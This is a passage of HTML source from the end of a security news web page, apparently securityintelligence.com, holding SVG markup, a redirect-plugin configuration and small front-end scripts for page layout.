69H4.9V8.4H2.38Zm0-1.68H4.9v.84H2.38Zm0-1.68H4.9V5H2.38ZM.69,12.6H6.58v.84H.69Zm0-1.68H6.58v.84H.69Zm0-8.41H6.58v.84H.69ZM.69.82H6.58v.85H.69Z" /> </svg> </span> </a> </div> </section> </div> </div> <script> window._appInfo = window._appInfo || {}; window._appInfo.newsCredAPIKey = "YXJ0aWNsZT1lMzhlMzdjNGEwNjkxMWVmYjg1M2FhOWE2N2MwMmE2Mg=="; </script> <!-- FOOTER SCRIPTS --> <script type="text/javascript" id="qppr_frontend_scripts-js-extra"> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/securityintelligence.com\/defining-security-intelligence\/":[0,0,"https:\/\/securityintelligence.com\/defintion-security-intelligence\/#.VS_NwpNnuZA"],"https:\/\/securityintelligence.com\/security-vulnerability-management-its-about-outcomes-not-activity\/":[0,0,""]},"siteURL":"https:\/\/securityintelligence.com","siteURLq":"https:\/\/securityintelligence.com"}; /* ]]> */ </script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4" id="qppr_frontend_scripts-js"></script> <script> setTimeout(() => { document.querySelector(".related_content").style.visibility = 'visible'; document.querySelector(".related_content.article.article_grid.article__mobile--card.article--IBM_blog > c4d-card > c4d-card-footer").shadowRoot.querySelector("#link").style.justifyContent = 'flex-start'; }, 100); </script> </body> </html>